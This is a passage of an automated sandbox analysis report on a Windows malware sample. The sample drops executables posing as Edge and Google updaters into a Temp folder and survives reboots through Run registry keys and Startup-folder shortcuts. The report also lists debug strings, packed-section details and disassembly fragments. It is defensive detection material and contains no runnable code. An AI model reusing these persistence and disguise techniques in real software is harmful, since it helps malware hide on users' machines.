Source: LKMService_f398b917ebdf42d684e3df08d449596d.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d550e8040e9f44f19bffddc3e8e06d5e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_28a5b517ff724da4be16ea4aaf5a357c.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ed539e9b377a47aebbf43d3ea0cb839e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7d29b77eb5544048bf84a48c0bc966be.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a97a4cd7e177496cae1d18f2d60edeb6.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_fff188210d924c868774a26b37b1f9c9.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_acbb346df900467ebd8c2c0ce13844f9.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2d07a0547ac04ab9af7372ee910ba6b1.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b87af243048a4cb58e7fbbcc09d4d0bb.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_687a9749c9a44df689e436ec246c5fcc.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_92fa881b504c497db058025dd6cb3bc4.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7172ee7a982744218b205a6832554ab3.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_17b0682e31094ae8b61542e0fc483319.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8f3c4b00bddc456e9c6e890ed0339b68.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_111bb590f9e24471b247ca4b4d7fd194.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_270b1265d8e74892bac3d731d24190c0.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_59312c45173e49bd8b855b176d5a495f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_284cd24aa4e1493cb8422375a300e535.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_75bc3afdb6384591b03d648ecbb02287.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c460e1bb0908400c8719e2ff6efc6472.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_255ec7c5f6124168899ab52eb1fb3db9.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ee6262db977148f9b6ce41041a0fbdf7.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_46234ffc04244b23ac4dc3e0979a0b7d.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_41851dcfce50420bb4154e63f25f2a8e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_5f419d2562814795914a60f7e574128b.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ba60f2e1542943c49cb63fcb463703a8.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9dac438bfec04a60812adddf7761318f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb=" source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbTM source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbon n source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 3{C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb_+f source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL}) source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs' source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m0C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb( source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb`V source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbt source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB0 source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbrL source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.PDBgi~m source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\LKSM.pdbo+v source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb35$ source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbte source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor$ source: GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: {%%.pdb source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbSe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdbN source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source: Binary string: \??\C:\Windows\System.Core.pdby source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbV source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb%&, source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor4 source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: m0C:\Windows\mscorlib.pdby source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb ~, source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: osymbols\dll\mscorlib.pdbLb source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb-Vs source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb9 source: GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: LKSM.pdb< source: WER951D.tmp.dmp.17.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tLKSM.pdbpo source: LKMService.exe, 0000000F.00000002.2519054896.00000000007B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdbps source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\LKSM.pdbpdbKSM.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: LKSM.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe6 source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@=B source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbo source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb/# source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbti source: WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbY= source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb# source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: System.pdb4 source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb3 source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdb source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb**# source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source: file.exeStatic PE information: 0xD12A4096 [Fri Mar 14 19:46:30 2081 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: ."Rv
Source: file.exeStatic PE information: section name: .wyi
Source: file.exeStatic PE information: section name: ."Rv
Source: LKMService.exe.0.drStatic PE information: section name: .wyi
Source: LKMService.exe.0.drStatic PE information: section name: ."Rv
Source: GoogleUpdater.exe.2.drStatic PE information: section name: .wyi
Source: GoogleUpdater.exe.2.drStatic PE information: section name: ."Rv
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF5EE7 pushfd ; retf 0_2_04DF5EF9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF7FA8 push esp; iretd 0_2_04DF7FA9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF7F48 pushad ; iretd 0_2_04DF7FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_049B5EE7 pushfd ; retf 2_2_049B5EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_049B7F48 pushad ; iretd 2_2_049B7FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_050E7F48 pushad ; iretd 3_2_050E7FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_050E7FA8 push esp; iretd 3_2_050E7FA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_050E5EE7 pushfd ; retf 3_2_050E5EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 4_2_05257F48 pushad ; iretd 4_2_05257FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 4_2_05255EE7 pushfd ; retf 4_2_05255EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 11_2_0520801D push es; ret 11_2_0520801E
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 11_2_05207F10 push cs; ret 11_2_05207F16
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 11_2_05207F48 pushad ; iretd 11_2_05207FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 11_2_05207FA8 push esp; iretd 11_2_05207FA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 11_2_05205EE7 pushfd ; retf 11_2_05205EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 15_2_04887FA2 push esp; iretd 15_2_04887FA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 15_2_04887F58 pushad ; iretd 15_2_04887FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC5EE7 pushfd ; retf 18_2_04AC5EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC7F48 pushad ; iretd 18_2_04AC7FA1
Source: file.exeStatic PE information: section name: ."Rv entropy: 7.004647399293236
Source: LKMService.exe.0.drStatic PE information: section name: ."Rv entropy: 7.004647399293236
Source: GoogleUpdater.exe.2.drStatic PE information: section name: ."Rv entropy: 7.004647399293236
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419eJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnkJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ec7e774008154f3596c8e5c3ca65b43a.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8b0b963caf834d029f35df17c1c436c7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1bc86309aad64beaaba50da47f1fe248.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7a283f2dc44047f9b90f76f7687c84db.lnkJump to behavior
